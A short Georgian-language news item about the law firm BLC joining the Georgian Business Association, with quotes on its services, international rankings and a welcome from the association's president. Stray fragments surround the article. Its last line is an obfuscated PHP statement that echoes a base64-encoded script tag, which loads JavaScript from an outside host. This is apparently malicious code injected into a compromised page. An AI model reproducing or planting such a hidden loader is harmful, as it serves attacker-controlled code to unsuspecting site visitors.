gorgia
jaluzi

იურიდიული ფირმა „ბიელსი“, რომელიც 2000 წელს პროფესიონალი იურისტების მიერ დაარსდა და 25 წლიან საქმიან გამოცდილებას ითვლის, „საქართველოს ბიზნეს ასოციაციის“ წევრი გახდა.

ამის შესახებ ინფორმაციას „საქართველოს ბიზნეს ასოციაცია“ ავრცელებს.

მათი ცნობით, „ბიელსი“ ადგილობრივი ბაზრისა და ეკონომიკის ზრდასთან ერთად განვითარდა და დღეს ის საქართველოში ერთ-ერთ წამყვან იურიდიულ კომპანიას წარმოადგენს, რომელიც მომხმარებელს საბანკო და საფინანსო სამართლის, საგადასახადო სამართლის, კორპორაციული ტრანზაქციების, უძრავი ქონების, ენერგეტიკის, სასამართლო დავებისა და საერთაშორისო არბიტრაჟის მიმართულებით სრულ იურიდიულ მომსახურებას სთავაზობს.

„ამჟამად, კომპანიას მართავს შვიდი პარტნიორი და ჰყავს საქართველოში ყველაზე დიდი და მაღალკვალიფიციური იურისტების გუნდი, გამორჩეული უმაღლესი ეთიკური სტანდარტებითა და პროფესიონალიზმით.

2003 წლიდან „ბიელსი“ აღიარებულია, საქართველოში მოქმედ წამყვან იურიდიულ ფირმად ყველაზე მსხვილი კვლევაზე დაფუძნებული საერთაშორისო სამართლებრივი ჟურნალების (Legal 500, Chambers Global, IFRL) მიერ“,- ნათქვამია ინფორმაციაში.

მათივე ინფორმაციით, კომპანიას ოფისი აქვს როგორც თბილისში, ისე ბათუმში და ბაზარზე წარმოდგენილია პარტნიორი იურიდიული ფირმების გლობალური ქსელით.

„მივესალმებით კომპანია „ბიელსის“ „საქართველოს ბიზნეს ასოციაციაში“. „ბიელსი“ სანდო და სტრატეგიული პარტნიორია როგორც საერთაშორისო ინვესტორებისთვის, ისე საფინანსო ინსტიტუტებისთვის, საელჩოებისთვის, არასამთავრობო ორგანიზაციებისა და ადგილობრივი ბიზნესისათვის. მოხარულნი ვართ, რომ „საქართველოს ბიზნეს ასოციაციისა“ და „ბიელსის“ საქმიანი ურთიერთობები შედგა და დარწმუნებულები ვართ, რომ ჩვენი თანამშრომლობა ორმხრივად სასარგებლო და პროდუქტიული იქნება“, - განაცხადა „საქართველოს ბიზნეს ასოციაციის“ პრეზიდენტმა, სოსო ფხაკაძემ.

149
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");